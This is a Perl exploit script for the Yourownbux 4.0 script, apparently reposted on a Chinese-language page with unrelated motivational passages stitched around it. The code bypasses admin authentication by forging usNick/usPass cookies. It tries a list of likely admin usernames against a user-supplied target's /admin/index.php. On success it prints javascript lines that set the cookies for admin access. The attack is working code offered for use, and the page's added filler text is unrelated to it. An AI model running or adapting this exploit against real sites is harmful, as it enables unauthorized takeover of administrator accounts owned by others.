Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit

当走过了曾经隐忍的年月再回首时,我才发现,曾经觉得难以启齿的往事,都不过是沧海一粟,生命给予我的,不是那些艰难,而是成长,是学会举重若轻,是将曾经无法释怀的那些过往,统统放下。
#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request;

# ------------------------------------------------------------------------------------------------- -#
# Yourownbux v4.0 ------------------------------------------------------------ --
# Cookie Modification Exploit -----------------------------------------------------------------
# Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------
#
# Dropsec.com
#
# Modify The Line 39, Adding More User's that can be the admin username------------
#
# Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --
# ------------------------------------------------------------- ----------------------------------------#



system("clear");

print "
# Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com
\n\n";
print "Target [ Example: www.sitedemo.com ] :\n> ";
$target = <STDIN>;
chop($target);

if($target =~ m/www\.(.*)\.(.*)/) {

$other = $1;
check1($target);

} else {
print "\nInvalid Target.";
exit();
}

sub explote {

@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");
# Add Posible Users.

$check = shift;

foreach $user (@tryusers) {

$pass = "Tec-n0x";

print "\n\tTrying > $user\n";

$browser = LWP::UserAgent->new();
$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");
$get = HTTP::Request->new(GET => $check);
$resp = $browser->request($get);
$content = $resp->content();

@code = split("\n",$content);

foreach $checka (@code) {

if($checka =~ m/Emails|Served|Workload|Overview/) {

system("clear");

print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:";

$vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;";
$vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;";

print "

------------------------------------
$vd\n $vda
------------------------------------
";


$yes = 1;

exit();

}
}
}

if($yes != 1) {

print "\n\n\nExploit Failed";

exit();

}

}
sub check1 {

$target = shift;

$check = "http\:\/\/$target\/admin\/index\.php";

$browser = LWP::UserAgent->new();
$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
$get = HTTP::Request->new(GET => $check);
$resp = $browser->request($get);
$content = $resp->content();

@code = split("\n",$content);

foreach $checka (@code) {

if($checka =~ m/You must login as administrator to access this page/) {

print "Check 1 [ OK ]\n";

$success = 1;

explote($check);

}

}

if($sucess != 1) {

print "Failed";

exit();

}

}

本文Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit 到此结束。一个成熟的人握住自已快乐的钥匙,他不期待别人使他快乐,反而能将幸神福与快乐带给别人。小编再次感谢大家对我们的支持!